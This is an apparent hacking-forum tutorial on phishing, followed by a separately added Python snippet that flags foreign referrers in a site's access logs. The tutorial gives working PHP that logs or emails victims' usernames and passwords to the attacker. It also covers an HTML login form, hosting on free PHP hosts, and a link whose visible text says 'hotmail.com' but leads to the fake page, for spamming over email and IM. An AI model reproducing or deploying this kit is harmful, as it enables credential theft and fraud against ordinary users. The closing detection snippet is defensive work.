Looked around to see if there was a guide and found nothing. I did find premade templates but I think it would be best to explain exactly how they work.
First off, let's point you to the Wikipedia article on phishing since we don't need to repost all of it here: Phishing - Wikipedia, the free encyclopedia. You don't need to read this to follow this post, it's just a good reference.
Phishing is more or less all about stealing sensitive information from unknowing people by presenting them with a false/fake front to a popular or sensitive website and tricking them into thinking it's the real thing.
The most common phishing requests in NS&H are focused around MySpace and Hotmail or other email sites.
A better description:
From Phishing - Wikipedia, the free encyclopedia:
In computing, phishing is a criminal activity using social engineering techniques. Phishers attempt to fraudulently acquire sensitive information, such as usernames, passwords and credit card details, by masquerading as a trustworthy entity in an electronic communication. eBay and PayPal are two of the most targeted companies, and online banks are also common targets. Phishing is typically carried out using email or an instant message, and often directs users to a website, although phone contact has been used as well. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, and technical measures.
How do I phish?
Now, how exactly do you phish someone? It involves a few steps:
1. Create a fake login or other information gathering page for the site you are impersonating
2. Host the phishing page
3. Trick a user into visiting the page
4. Cross your fingers and hope they log in
Most people are looking for help with the first three steps.
Creating a Phishing Page
Creating a phishing page is easy but requires some knowledge of both HTML and a language you can use to script the "stealing" of information like JavaScript or PHP. Keep in mind your host will need to support PHP if you plan on using that.
You more or less go to the site you are impersonating and view the HTML source. In Firefox this can be done with View->Page Source and then cutting and pasting the code into a text editor.
From there, you'll want to edit the HTML code so that the references to images, scripts, etc. all point to the real site where they are hosted OR you'll want to download them all locally and reference them that way.
If someone wants to provide links to various pre-made phishing pages, feel free to post them and I'll add them to this post.
Once the page "looks" right, you'll want to go look at the HTML form that submits the login (or other information) to the site. You need to edit this form so that instead of sending that information to the real site, it logs it to a file or emails you the information instead. This usually involves using a PHP script to handle the form submission. The PHP script will define what happens with the information the user submitted. You'll need to at least understand how to program very basic stuff and how to get help in case you don't understand how to do something.
Here is a quick code example:
Code:
<?php
// Save information to file.
$performlogin = $_REQUEST['performlogin'];
if ($performlogin == 1)
{
$file = "data.php"; //Free php host usualy doesn't allow other files then *.php.
$fp = fopen($file, "a"); // Append to file.
$data = $_POST['username'];
fwrite($fp, "$data\r\n");
$data = $_POST['password'];
fwrite($fp, "$data\r\n");
fclose($fp);
}
// Send information to mail.
if ($performlogin == 2)
{
$username = $_POST['username'];
$password = $_POST['password'];
$message = "Username: $username\r\nPassword: $password";
@mail("[email protected]", "phising", $message) or die;
}
header("Location: http://www.targetsite.com/loginError"); // Redirect to error login page.
?>
Form:
Code:
<form action='form.php?performlogin=x' method='post'> // x = {1, 2}.
<input type='text' name='username' />
<input type='text' name='password' />
<input type="submit" value="Submit">
</form>
Now you should have the HTML for the page you're faking looking just like the page itself, with all references to images and CSS being "fixed" so that they point to the right places and a form handling script that "steals" the user information when they try to use your fake site to log in.
Hosting the Phishing Page
The next step is to host your phishing page somewhere online. Commonly used hosts are any free host that supports PHP. You don't need a lot of hard drive space from the host, so that doesn't matter.
Freewebs, GeoCities, whatever. Find a host you like and upload your page to it. If you're using PHP, again make sure the host supports PHP. If it doesn't, you'll need to find a different host or modify your phishing page to not use PHP.
Trick a User Into Visiting your Phishing Page
This can either be the easiest part or the hardest part, depending on your technical skills and the level of intelligence of the user you are trying to trick.
There are (or were) some exploits for common browsers that would allow a site to modify what the URL bar in the browser said so it could look very legitimate. I don't know the specifics, but someone else can elaborate.
That aside, you can spam disguised links in emails like this:
Code:
<a href="http://myhost.com/myphshingpage.php">http://www.hotmail.com</a>
where "hotmail.com" would be the site you are emulating.
Be warned that many spam filters notify users of this and modify the emails so the links are removed.
Another method is to send the same kind of link to people over various IM services, especially those that support HTML messages. This is less likely to get picked up by spam filters or other "protection" software.
Hope you guys like it! Enjoy!
If you have any questions, let me know.
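A page built as described above leaves traces on the impersonated site: its hotlinked images and CSS, and the final redirect to the login error page, can arrive with a `Referer` naming a foreign host. The following is an added detection example for the site owner, not code from the original post; the asset path `/static/login/`, the hostnames in `OWN_HOSTS`, and the log lines are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Assumptions: the real site's hostnames and the paths its login page uses
OWN_HOSTS = {"www.targetsite.com", "targetsite.com"}
LOGIN_PATHS = ("/static/login/", "/loginError")

# Combined Log Format: ip - - [ts] "METHOD path proto" status bytes "referer" "ua"
LINE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" \d{3} \S+ "([^"]*)"'
)

def offsite_referrers(log_lines):
    """Map each foreign Referer host to the login-related paths it requested."""
    hits = defaultdict(set)
    for line in log_lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        _ip, path, referer = m.groups()
        if not path.startswith(LOGIN_PATHS):
            continue
        host = (urlsplit(referer).hostname or "").lower()
        if host and host not in OWN_HOSTS:
            hits[host].add(path)
    return dict(hits)

# Constructed access-log sample (documentation IP ranges)
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /static/login/logo.png HTTP/1.1" 200 5120 "http://myhost.com/myphshingpage.php" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /loginError HTTP/1.1" 200 2048 "http://myhost.com/" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /static/login/logo.png HTTP/1.1" 200 5120 "http://www.targetsite.com/login" "Mozilla/5.0"',
    '192.0.2.11 - - [01/Jan/2024:10:02:00 +0000] "GET /static/login/login.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]
```

Hosts returned by `offsite_referrers` are candidates for a takedown request and for blocking at the mail gateway; an empty or missing `Referer` is ignored, so this is one signal and not complete coverage.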